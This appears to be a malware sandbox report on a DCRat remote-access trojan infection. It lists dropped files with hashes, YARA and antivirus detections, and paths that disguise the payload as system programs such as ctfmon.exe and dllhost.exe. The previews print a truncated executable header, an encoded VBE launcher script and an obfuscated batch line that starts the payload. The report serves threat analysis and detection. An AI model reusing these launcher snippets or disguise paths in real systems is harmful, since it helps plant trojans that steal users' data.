Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Desktop\CqAggkYA.log | DCobxod.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
 | fatality.exe | Get hash | malicious | CryptOne, DCRat, Mofksys, PureLog Stealer, zgRAT | Browse
 | NursultanAlphaCrack.bat.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
 | SearchIndexer.exe | Get hash | malicious | DCRat, Neshta, PureLog Stealer, zgRAT | Browse
 | fatality.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
 | OneDriveStandaloneUpdater.exe | Get hash | malicious | DCRat | Browse
 | 85D5ktqjpd.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
 | VIyu4dC9CU.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
 | top.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
 | DC86.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):116
                                                          Entropy (8bit):5.549243602643733
                                                          Encrypted:false
                                                          SSDEEP:3:yJ3ieZ9FhkuAjTkFtS/vHWd1gkUUfyFgVSLvTbqBb:CFjFtSnuo3FTvQ
                                                          MD5:440F3FFAAF6D441BF410AE8CABC777B4
                                                          SHA1:108CA4D69165AC5C4FCEE8CBF7A63B835B6A479D
                                                          SHA-256:F126BA721E6E32CFFD181FACEEF76E508E298B24E9591951EF17E0295D86F9A0
                                                          SHA-512:F9F02A8FCE6568D29289DBFFFF2F2C669986BBBC97C475E35791A3212C04CED3B85726B889BCA3B12C0DC9AA96D7949DD2E107BD2B8D7E75506552B0694D8275
                                                          Malicious:false
                                                          Preview:wK4nWChWCt2LMbRGDmlNVXBh6mMFrHRcSWRKeFv9rvMGqQC1tLrkHdvZJWqt0co4ca30JHm81mgkK41qkUWgZqUyk2AIYBIPGSoQWMrljtsf6LPOeAJf
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\jDownloader\config\explorer.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with very long lines (503), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):503
                                                          Entropy (8bit):5.8731118905923845
                                                          Encrypted:false
                                                          SSDEEP:12:FNpMriHkuvrnJpzDzCfWqsBLk88tEpCRCeHxM82mW2X/Kc:F7PPnnzDzKZs9n8tEG9Hh2mvt
                                                          MD5:1B47589743AC0159B3627BF815242A34
                                                          SHA1:318636755B518E54DB01044649B371D049F6D79B
                                                          SHA-256:58DDC2F31160596651EB92E7825589F753C70A2E22468FE15970475E9CCADC96
                                                          SHA-512:41B457046A851E9132724D34F86891003954E61E0FF8EE341BA70E13A5C18AAC77BA8252D31B45491E733B3EEABF784936E34680E13BD369F8833F4629493456
                                                          Malicious:false
Preview:
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:RAGE Package Format (RPF),
                                                          Category:dropped
                                                          Size (bytes):85
                                                          Entropy (8bit):5.307641047999533
                                                          Encrypted:false
                                                          SSDEEP:3:kPVk8QdUJ+0TsnT3juXhgqa2WDfn:ktk8QWw0TU3SX2R2gf
                                                          MD5:02270DAE0A935C621C7CD866FC18C0B1
                                                          SHA1:06E74ED7ED417C717058948512AB1D2E65B327A8
                                                          SHA-256:FEE0034A1025355471DB541D1972363DB34030CE5B9B42FA3B06C1676C121C60
                                                          SHA-512:F53C14C273C3A28391324C13BEC84B7B68424261E3E1D0C21FA1F409869DC11ACEEC664DD3C5ED850DE22757A1EB5AAA49652B7481626E819D07A5748BADEC33
                                                          Malicious:false
                                                          Preview:PRGdj0dRd1QkTXmu7q8z1ZnwnY2nJ8x2KS6afFK2BpsX74qv2VKyxPM0oT0K80IeEXZBbMO1gGxMrPysrGuxx
                                                          Process:C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):250
                                                          Entropy (8bit):5.871911059647132
                                                          Encrypted:false
                                                          SSDEEP:6:GhwqK+NkLzWbHK/818nZNDd3RL1wQJRWyOKIdEwv4R77lym0wI8gt/WU:G0MCzWLKG4d3XBJ2KIdEwv4FiwIxxX
                                                          MD5:D8776D21A414703FCF32711BB7ECDFB4
                                                          SHA1:1C6820CA5097513A2BE072A3B43EFF1FC8403184
                                                          SHA-256:BB5A09775DCAEB1C3C4D3CDD4C207C96F1A153AA23FED7512367ECA6A3A0C22D
                                                          SHA-512:AD33CA536CC149301BA111280388A9A6295DDD7C2BE76FA3EEFBA8CAB1F2727A4EFFC57B24ADBF0BE8F10C2D13872C215F9512DD470990541B39E2D2681595A9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:#@~^4QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJn.K\bN+M/..\.D.E.Yrh.w+MW?7mzJAU.0KK0tk.^\DotqBtlbF9gtonj"wd5gr.1p~4;%*S}! 4mYE~,!S~6lVknOUoAAA==^#~@.
                                                          Process:C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                          Process:C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):110
                                                          Entropy (8bit):5.0634698325180425
                                                          Encrypted:false
                                                          SSDEEP:3:2pzMKCk2N+mpZIl2uROVep1MNX6A0EAjn2fi:f9wmolRRODdAj2fi
                                                          MD5:9C91FE8E1765DDF30EDA4052CBECBF48
                                                          SHA1:8ACEC401BDEC034D55EAD6804C69505C1D680E67
                                                          SHA-256:9420D7930AE9F2040D5B46BC120DA24E920FCCF6882E69B74269F71E75CC0718
                                                          SHA-512:E72EC080AE8FC66A5F712E3A525F0013D406B587523B3B6FF8DC80F12F12AF183FC77B578293808F07E916A8B6F2252206B3C899200D0F70540CB70DE467EA87
                                                          Malicious:false
                                                          Preview:%BPkFMVYRvu%%fdibounXfdogAS%..%vsDdPP%"C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"%FBoBBzENDIVjpr%
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with very long lines (402), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):402
                                                          Entropy (8bit):5.804126895440589
                                                          Encrypted:false
                                                          SSDEEP:12:BkRQmbx1prpNs10WjnwBASy2EX4dBoDJSWEh4T:ef1lWjwBAh2EXjYWrT
                                                          MD5:102F51680FADF5806C9F206AAADF72F5
                                                          SHA1:E11B9845B9F84B43D6FB000B83FA6C85F85C5AF0
                                                          SHA-256:FAF9E396DB47687AE7D42E40FE88C980E2901205C2EB592E5EF90E4A23363CC1
                                                          SHA-512:98C332999177171BC4C8D511083B2E61061DE8E322A3CBBEEB6755DB3EA720300574B192D4EE45D6DC04896BB302B98B75B64CB1EE18D6F1D6EF11418D7EC12C
                                                          Malicious:false
                                                          Preview:sW9cHx83xz2jBTe4kTgLwixHOQG2K61IWQ1KUIsk6VWRHGXGVL6UWolKi1O0qFt08uNvbUjbk6PaMfAH3Ag8Agvrorlc3130mfTW3moBmetaYL7D0G7piuzb8fHusGhsCZyqMoORWfWgwVTdtilw4NR1q1XXe4Sf6AY9WR0M2qTDYTonMnAKfvyyH6AUQ1wcM1kw6TGcrZ4O4NdXMuK13IALMj2ZRg6B311gt2q3hicF0k43dnHgq5iD1YkXbqLLc3UDW6nUDRTVp4Ulp86nYZU8SxpUSTb0XRn6P1hh9xdYlNX6D8rduhwDiVuiQTBuzd7YRYVyaYol66XEZsQUl8G0ejX4G9QpwtiIP9ppm3CV2LGm8qIhCqI1WH3rAbsbI8zNYPyaDlsr6u7Tdv
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):155
                                                          Entropy (8bit):5.562491567694741
                                                          Encrypted:false
                                                          SSDEEP:3:JQ5MPoJK2GirCLE2E3+A6yTCjvHYkRevE53IKTyAU0zQlKxyGIX7jHY1tfn:+c5UIfMa8CjLUsmCtVzQlKUfX7jOtf
                                                          MD5:738151E13F8E1BE31D29C42956977DE9
                                                          SHA1:182BCF64C61927BFACDE3706C87F9F1238CB04BA
                                                          SHA-256:649A72D39B47626493434C0EC16B495F9D98095164AC468268C68D4B4804BD13
                                                          SHA-512:050E56E0A9E55CF61F061720966E263C0B77502D0CC58356A05662FFC205D26DB572E4E0E71C7A3C38A1D44FF2D35C0872F4946CF7ADA8AD25A000BDE60F0DDA
                                                          Malicious:false
                                                          Preview:Aeuu9R7vj2LqAMlaFSYnmfTt87TFXbgfGqgnZLwSaQkgvN7jwoqEDigeLBvB71XHWqkUq7A4gFMW5w7uAuTtvbchJBcYZuVj3dKFnm3ynwi7WKjYDBBNhoV5ODKofmewunccm2HY1fG93eK9cDVYsHBPHP0
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\Documents\dllhost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1830
                                                          Entropy (8bit):5.3661116947161815
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4vtd
                                                          MD5:4E98592551BD0B069F525D5145C4AB1D
                                                          SHA1:F76B60DC100FAB739EB836650B112348ED7B9B97
                                                          SHA-256:171B3D8F6F3559D645DECCA2C9B750EBFD5511B6742C0157C60F46EAD6CC4F5E
                                                          SHA-512:E5C520597C414A3F73AF0C4F2E2A61CE594D8CEC7FF103D94CCAEA905E0D5F6AF32CFAB40026865AE86172904F927B928663C9FA4B0EBD397CC450BF124A318D
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                          Process:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1281
                                                          Entropy (8bit):5.370111951859942
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                          Process:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1281
                                                          Entropy (8bit):5.370111951859942
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                          Process:C:\Users\Default\Documents\dllhost.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1281
                                                          Entropy (8bit):5.370111951859942
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                          Process:C:\Program Files (x86)\jDownloader\config\explorer.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1281
                                                          Entropy (8bit):5.370111951859942
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.323856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:hwInrUUz:h1rl
                                                          MD5:7F91C915756AE659EF4C24BEFFDCCBF8
                                                          SHA1:944AED3CFBED200A1E087CAC616970D35EBA4442
                                                          SHA-256:1A6446B38EA25C1DA12B337D58AE59D45466FF85C00D54B7542009F4E87CA044
                                                          SHA-512:9F1D3763950E741796BA18111962B38AF18766B18D959DD8B314F235BA9C7A68CE4DC7A0F847D3F87567998555971092903A2CC8C472FE033BFA3BF0A4225F7B
                                                          Malicious:false
                                                          Preview:gNSkepUqHTRrbAJYeHc1FVqES
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Mon Jan 13 13:27:02 2025, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1960
                                                          Entropy (8bit):4.561608901700241
                                                          Encrypted:false
                                                          SSDEEP:24:HPjS9YVXO2L3DfHvOWwKE+lKdYN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0c:DgkT21KplKmKluOulajfqXSfbNtmhxZ
                                                          MD5:116E95EF3A427F30EDB3ED0781A30833
